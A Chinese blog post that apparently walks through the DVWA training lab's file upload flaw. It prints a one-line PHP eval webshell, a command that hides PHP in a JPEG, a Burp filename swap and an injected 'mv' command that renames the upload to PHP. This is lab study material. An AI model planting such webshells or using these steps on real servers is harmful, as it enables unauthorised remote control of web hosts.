首页 > 其他分享 >DVWA文件上传

DVWA文件上传

时间:2023-05-12 13:33:46浏览次数:32  
标签:文件 .. jpeg DVWA php 上传 连接 安全级别

Low安全级别:

<?php @eval($_POST['cmd']);?>

文本编辑器写入一句话木马,保存并改为php文件。

上传

成功上传,并返回路径

打开菜刀客户端连接

成功连接

反弹shell

Medium安全级别

上传php脚本发现,上传类型做了限制,只允许上传JPEG和PNG类型。

思路一:利用图片马上传

将php和jpeg文件 用copy命令 合成一张图片

Copy behinder.php/b +image.jpeg/a imageHack.jpeg

上传图片马

上传成功

菜刀连接

连接成功,返回shell.

思路二:burp抓包改文件格式

如图 抓包 filename 为jpeg格式

将其改为php格式

发送请求包

上传成功

菜刀连接地址

成功

三.high安全级别

同样能用图片马连接成功,但是无法返回shell

需要结合High级别的文件包含漏洞一起利用。

127.0.0.1 & mv .. /../hackable/uploads/behinder.jpeg ../../hackable/uploads/behinder1.php

将 jpeg文件重命名为php执行。

再用菜刀进行连接。

标签:文件,..,jpeg,DVWA,php,上传,连接,安全级别
From: https://www.cnblogs.com/fugodd-hacker/p/17393837.html

相关文章

  • oracle11 docker-compose.yml,启动时导入sql文件
    version:'3'services:oracle:image:wnameless/oracle-xe-11g-r2container_name:oracle11gr2environment:-'NLS_LANG=AMERICAN_AMERICA.AL32UTF8'volumes:-"./create.sql:/docker-entrypoint-initdb.d/......
  • FPGA IP 源码解密 Vivado加密的IP文件解密复原为Verilog或者VHDL源码 Mo
    FPGAIP源码解密Vivado加密的IP文件解密复原为Verilog或者VHDL源码Modelsim可以编译仿真的vp加密文件均可以解密复原为Verilog或者VHDL源码符合P1735格式保护的代码基本都可以解密还原源代码ID:39188688193060201......
  • .net core 上传文件大小配置
    发布会的web.config中下增加       Starup.cs增加//上传文件大小限制Kestrel设置services.Configure(options=>{//Setthelimitto256MBoptions.Limits.MaxRequestBodySize=268435456;});//上传文件大小限制IIS设置services.Configure(options=>......
  • WPF 资源文件 内容换行
    在文件头加一行xml:space="preserve"内容:<system:Stringx:Key="Title">AutomaticChemiluminescence&#x0d;&#x0a;ImmunoassayAnalyzer</system:String> 页面引用:Text="{StaticResourceTitle}" ......
  • webstorm左侧导航栏背景变成黄色的,文件搜索,定位等一系列功能都不好用了?
     解决办法:简单说,就是关闭webstorm,然后在终端把.idea目录删除。再打开。 参考:https://www.cnblogs.com/monozxy/p/13932067.html ......
  • 开启“存储感知”,让Win10自动删除临时文件释放磁盘空间
    开启“存储感知”,让Win10自动删除临时文件释放磁盘空间发表于2017年12月6日17:01:22由MS酋长PS:由于Windows10在持续更新,所以“存储感知”功能也在改进,因此本文内容也在与时俱进持续更新。虽然现在硬盘容量已经很大了,但疏于清理系统或SSD固态硬盘用户却仍然经常会遇到磁盘空......
  • 整一个工具类【根据URL地址获取file文件对象】
    整一个工具类【根据URL地址获取file文件对象】直接将网络url文件转换为file对象importjava.io.*;importjava.net.URL;publicclassImgUtils{/**从URL中获取图片输入流*并创建本地文件*@paramimageUrl*@paramsavePath*@return*......
  • 17.如何将py文件打包成可执行文件exe格式
     首先需要通过pip安装pyinstallerpipinstallpyinstaller在相应的要打包的py文件夹下执行:pyinstaller-F-wlogin2.py会生成一个dist文件夹,里面就是打包好的exe ......
  • 华为OD机试 打印文件
    最近更新的博客华为od2023|什么是华为od,od薪资待遇,od机试题清单 https://dream.blog.csdn.net/article/details/128980730华为OD机试真题大全,用Python解华为机试题|机试宝典 https://dream.blog.csdn.net/article/details/129221789【华为OD机试】全流程解析......
  • php获取目录下所有文件及目录
    来源:http://www.shanhubei.com/archives/2614.htmlhttp://www.shanhubei.com/archives/1940.html获取某目录下所有子文件和子目录functiongetDirContent($path){if(!is_dir($path)){returnfalse;}//readdir方法/*$dir=opendir($path);......